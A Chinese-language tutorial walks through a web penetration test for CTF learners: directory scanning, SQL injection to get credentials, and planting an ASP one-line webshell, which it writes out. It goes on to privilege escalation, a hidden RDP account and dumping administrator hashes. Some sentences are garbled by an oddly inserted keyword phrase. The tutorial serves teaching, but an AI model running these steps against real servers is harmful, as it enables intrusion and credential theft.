web渗透测试常规套路

0×01 本篇文章旨在给小白白们做一次有关web渗透的科普，其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用，但是其中涉及的思想永远不会过时，其中的工具如菜刀等更是经典之作，即使发布已经10余年认识现在集群智慧云安服渗透测试网站的不可或缺的利器之一。 另：面向学生的CTF，出题者考虑到学生的实操能力，设计的web题，或者拿服务器找flag的大题大部分用本文介绍的思路、工具就能成功cpature the flag。 说明：作者已获题中出现网站授权，为避免敏感信息泄露，仍会采取打码措施，望学习本文的小伙伴们不要在未获授权、许可的情况下对他人网站进行集群智慧云安服渗透测试。 0×02 准备工作： 准备好以下工具：御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等 拿到一个网站，首先我们最容易想到的就是扫描目录。 最常用的工具是御剑，页面如图 在域名空格中输入我们测试的网站的域名，点击开始扫描即可 我们在结果中发现/admin，这疑似后台页面，双击该链接进入，看看判断是否正确 可以看到确实是后台登陆页面 找到后台登陆界面了，接下来我们就需要登陆的用户名和密码了，所以寻找用户名和密码就是我们下一步的工作 这一步我们用到的工具是Domain3.6，界面如图 点击SQL注入—》批量扫描注入点—》添加网址，输入网址 点击OK，然后点击批量分析注入点 结果如下图，成功得到用户名和密 不过密码很明显是md5加密后的 我们在Md5在线解密网站中解密即可 得到结果，明文密码为admin888 现在有了用户名和密码，我们就返回后台登陆页面 输入信息后成功登陆 成功进入后台 接下来我们需要获取webshell，这一步仁者见仁智者见智，需要凭借个人的经验来多次尝试分析确定 此处仅提供个人思路 我们点击左侧的“系统设置管理”—》“网站信息配置” 在公司名称处将原信息删除，换成我们的一句话木马 "%><%Eval Request(Chr(35))%><%' （解释：1.句首和句尾的引号用于闭合语句，2.Request()中的内容即连接菜刀时需要的密码，此处用的Chr（35）指的是ascii值为35的符号，即#，3.Eval Request()是asp一句话木马的常用格式） 这里小白白们可能会问了，为什么地址后面的/inc/config.asp之前没有见过呢？ 是这样的，这个网站用的是魅力企业网站管理系统（一个cms），我们可以在网上下到它的源码，可以看到它整个的目录结构，自然会明白我们修改的一句话的目录在/inc/config.asp 输入信息后点击添加，发现连接成功 注意：一般的CTF比赛，做到这个程度就可以在各个目录里找flag了，不过这次我们把整个渗透流程介绍完 接下来我们需要提权，那么就需要通过菜刀上传提权工具，这里上传的位置要选好，一般而言，c盘的子目录中的文件可执行的可能性较大 提权经典的搭配是cmd+3389+pr，我们这里就用这个组合，同时选定上传目录为C:\RECYCLER 我们win+r,打开运行框后输入mstsc，打开远程桌面连接 点击确定即可成功登陆 接下来我们需要想到这个问题：以后远程登陆难道及靠我们自己创建的帐号吗？要是哪天被管理员发现了，那怎么办，所以长久之计是在获取系统管理员的密码后删除自己创建的用户 那么，接下里我们要做的就是找到系统管理员的密码 我们这里用到的工具是quarksdump,还是和前三个工具一样，拖到菜刀里直接上传 进入recycler目录看到工具已上传 输入如图命令，回车即可得到 我们看到最下面一列是Administrators跟随的一串字符，这其实也是一串hash加密过的密码值(Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值)，解密得到 0×03 总结：我们这次的演示是一次典型的集群智慧云安服渗透测试的过程，主要思路为 扫后台—找注入点获取后台登陆密码—上传一句话木马---菜刀连接—提权—拿服务器获取系统管理员密码 用到的工具有：御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等 0×04 本文仅做技术分享及普及渗透流程之用，如有人企图以此来进行不合法的渗透等破坏网络安全的行为与本文作者及合天智汇无任何关系。特此声明。 文章出处： Yale 合天智汇